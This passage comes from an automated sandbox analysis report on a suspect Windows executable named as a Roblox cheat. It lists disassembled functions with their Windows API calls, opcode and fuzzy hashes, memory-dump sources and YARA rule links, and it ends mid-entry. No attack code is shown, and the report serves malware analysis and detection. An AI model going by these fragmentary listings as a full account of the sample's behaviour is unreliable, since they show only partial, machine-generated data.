                                                                              • API String ID: 1203560049-0
                                                                              • Opcode ID: bb03d890145153a6389d317eee9ce9bd5a67d6f121021ec7dbe6c19775fb5f48
                                                                              • Instruction ID: c09c730f18abcf73b5fb83f65181da2d70e6068e834b346ceff1b95738a1923e
                                                                              • Opcode Fuzzy Hash: bb03d890145153a6389d317eee9ce9bd5a67d6f121021ec7dbe6c19775fb5f48
                                                                              • Instruction Fuzzy Hash: EE218632A1878581EA208B29F4462297365FBC8BA4F540272EBAD97BE5DF3CE541C704
                                                                              Function 00007FF693E8BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                              • Instruction ID: 650fb692ec773defa29dbe20054e77c430aa4bc8a2038203d4939193bc2e11db
                                                                              • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                              • Instruction Fuzzy Hash: F3E09A28E0470A46EA746F719C96379239AEF88741F1054BAD80EA63A6CE3DA8498741
                                                                              Function 00007FF693E5F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E5F895
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E5F89B
                                                                                • Part of subcall function 00007FF693E63EC8: FindClose.KERNELBASE(?,?,00000000,00007FF693E70811), ref: 00007FF693E63EFD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                              • String ID:
                                                                              • API String ID: 3587649625-0
                                                                              • Opcode ID: f6fa25ad129010b84b8f33fd61341000d9c914db862da7234b37364a70f1a1a6
                                                                              • Instruction ID: 3b4b45f1d00837d229235da3a3cc3deb2f00020026f5726fb36f515952d494cc
                                                                              • Opcode Fuzzy Hash: f6fa25ad129010b84b8f33fd61341000d9c914db862da7234b37364a70f1a1a6
                                                                              • Instruction Fuzzy Hash: 0D91A073A18B81D0EF20DF24D4462ED63A9FB84798F904176EA5CA7AE9DF78D546C300
                                                                              Function 00007FF693E53904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: 21a43ee9d5bb3ff193924d88485a13e88477ac686680c8540aa6de97187d4b2e
                                                                              • Instruction ID: 27e414fbd2abe5ae90678364e440fc8b777aac2ff5619519e1c33d5adec35ef7
                                                                              • Opcode Fuzzy Hash: 21a43ee9d5bb3ff193924d88485a13e88477ac686680c8540aa6de97187d4b2e
                                                                              • Instruction Fuzzy Hash: C941AC62F1865284FF21DAB1D4423BD2368EF44B98F145276EE1DB7B9ADE3894828300
                                                                              Function 00007FF693E62778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF693E6274D), ref: 00007FF693E628A9
                                                                              • GetLastError.KERNEL32(?,00007FF693E6274D), ref: 00007FF693E628B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                              • Instruction ID: 7ecf36d46a7425c9de13f12fa9876d001acbd4554b7a7fa3580834d045cb847e
                                                                              • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                                                                              • Instruction Fuzzy Hash: E3319722B1965682EE704F2AD9426F93358EF44BD8F145172DF1DA77A0DE3CE8418740
                                                                              Function 00007FF693E522BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1746051919-0
                                                                              • Opcode ID: bec8d0c1c672d295977e9fc10f39d8f626ff81b9c2385a5dbc8c6e1febdb5a1a
                                                                              • Instruction ID: 8143473a3a59488ee645aeeb5ea256e45df6cbb525f06223c1b22ec1f110d95c
                                                                              • Opcode Fuzzy Hash: bec8d0c1c672d295977e9fc10f39d8f626ff81b9c2385a5dbc8c6e1febdb5a1a
                                                                              • Instruction Fuzzy Hash: DE31B222A1874682EE249F15F44637E7368EF94790F444272EB9CA7B95DF3CF5408704
                                                                              Function 00007FF693E62AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlushTime
                                                                              • String ID:
                                                                              • API String ID: 1392018926-0
                                                                              • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                              • Instruction ID: 7595ce41b9a9a1ba4d353b59d7709df13a44fe7f15430385692e5b975d6fec11
                                                                              • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                                                                              • Instruction Fuzzy Hash: 7821C422F0DB4651EA728E11D4167BA7798EF41798F1580B6DF4C66295EE3CD486C300
                                                                              Function 00007FF693E6AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString
                                                                              • String ID:
                                                                              • API String ID: 2948472770-0
                                                                              • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                              • Instruction ID: 8a4bd8ea26505428b7dd24528126bd3e0ec88ade881de0658c11bc5a48b6a536
                                                                              • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                                                                              • Instruction Fuzzy Hash: 11118BB0B1874186EA218F17A84202977B9FB89FC4B54497ACA0DF7720EF7CE9418744
                                                                              Function 00007FF693E62BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                              • Instruction ID: 929557061a03304c8d57f1ae2a473974530362a382fcb5d4ee2dd751934a7ea5
                                                                              • Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
                                                                              • Instruction Fuzzy Hash: EC118121A1864281FB708B25E8426797368FB54BB8F544373DB7DA62E5CF3DE996C300
                                                                              Function 00007FF693E5255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item$RectText$ClientWindowswprintf
                                                                              • String ID:
                                                                              • API String ID: 402765569-0
                                                                              • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                              • Instruction ID: 10396bc8310826f521b280b0b17ed0df28a96d7c88cfa354cdcc1d8b28c07f37
                                                                              • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                              • Instruction Fuzzy Hash: EB017120E0D34A42FF7A5B52A46A27957A9EF85744F0800B7E94DEA3D9DE2CF984C301
                                                                              Function 00007FF693E6EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF693E6EBAD,?,?,?,?,00007FF693E65752,?,?,?,00007FF693E656DE), ref: 00007FF693E6EB5C
                                                                              • GetProcessAffinityMask.KERNEL32 ref: 00007FF693E6EB6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AffinityCurrentMask
                                                                              • String ID:
                                                                              • API String ID: 1231390398-0
                                                                              • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                              • Instruction ID: d4d94d8a44e31e49bbfbcfcd04369a1333a542399515d493f2bb96799a1a66fe
                                                                              • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                              • Instruction Fuzzy Hash: E6E02B61F2464A42DF288F56D4425E97396FFC8B40B848037E60BD3624DE2CE5458B00
                                                                              Function 00007FF693E821D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                              • String ID:
                                                                              • API String ID: 1173176844-0
                                                                              • Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                              • Instruction ID: eeeee8731ff8fdd8a1b8ccd65068bcabeec2ac72cafeb358d5cb5cfc2d84aecd
                                                                              • Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
                                                                              • Instruction Fuzzy Hash: EBE01740E0E10B46FD38627618271B4008CCF29370E2C1BB2DE7EF92D3AE2CE4A28210
                                                                              Function 00007FF693E8D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                              • String ID:
                                                                              • API String ID: 588628887-0
                                                                              • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                              • Instruction ID: 9b025473eb6c232fb3bb9c1cb66d7a47a9543b69a7695d99bd4cf3c854b8b9f1
                                                                              • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                              • Instruction Fuzzy Hash: 84E0E650E0964787FF356FB2984717912DADF94755F0440B6D90DE6352DE2C94868701
                                                                              Function 00007FF693E533E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: f7206296fbad731e13628bf389820051144a1fb1724d87213a35627401b5a090
                                                                              • Instruction ID: 8031a47841ec86b36ba7eebbc37eef7049a90fad2d35778315ceb6a7d8ccb7d6
                                                                              • Opcode Fuzzy Hash: f7206296fbad731e13628bf389820051144a1fb1724d87213a35627401b5a090
                                                                              • Instruction Fuzzy Hash: C2D1B472B0968696EF7ACB2596423B967A9FB05BC4F0400B7CB1DD77A1CF38E4658700
                                                                              Function 00007FF693E65294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1017591355-0
                                                                              • Opcode ID: 388fc3c901f750e810fce68d2ec07def1b7a5bb75be5fb5e9f63537d100d501a
                                                                              • Instruction ID: ef5d0c19903c29f65357f2c4fe2fa3e7dc3fc8984f11bb49920e25089e7f67dc
                                                                              • Opcode Fuzzy Hash: 388fc3c901f750e810fce68d2ec07def1b7a5bb75be5fb5e9f63537d100d501a
                                                                              • Instruction Fuzzy Hash: B961D651F0C64782FA749A16841F27E7299EF85BD8F1441B3DF4EE6AC9EE6CF4418200
                                                                              Function 00007FF693E71870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E6E948: ReleaseSemaphore.KERNEL32 ref: 00007FF693E6E974
                                                                                • Part of subcall function 00007FF693E6E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF693E6E993
                                                                                • Part of subcall function 00007FF693E6E948: DeleteCriticalSection.KERNEL32 ref: 00007FF693E6E9AA
                                                                                • Part of subcall function 00007FF693E6E948: CloseHandle.KERNEL32 ref: 00007FF693E6E9B7
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E71ACB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1624603282-0
                                                                              • Opcode ID: 9a6db190a7b2ced1a532e1e2deef49cadd1901ccf5d6799b3b9573806cc4e890
                                                                              • Instruction ID: 7f00df26749bd74ec6c7495e09a04c0104dacaedf32c3349f74c03dfa5341581
                                                                              • Opcode Fuzzy Hash: 9a6db190a7b2ced1a532e1e2deef49cadd1901ccf5d6799b3b9573806cc4e890
                                                                              • Instruction Fuzzy Hash: F2619162B15B8592EE28DB65D5560BC7369FF40F94B544273EB2EA7AC2CF2CE4718300
                                                                              Function 00007FF693E5EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: a095aec0443fd8cf801f98afcb412b518cb1d8a0794272d33745bf5c125c604f
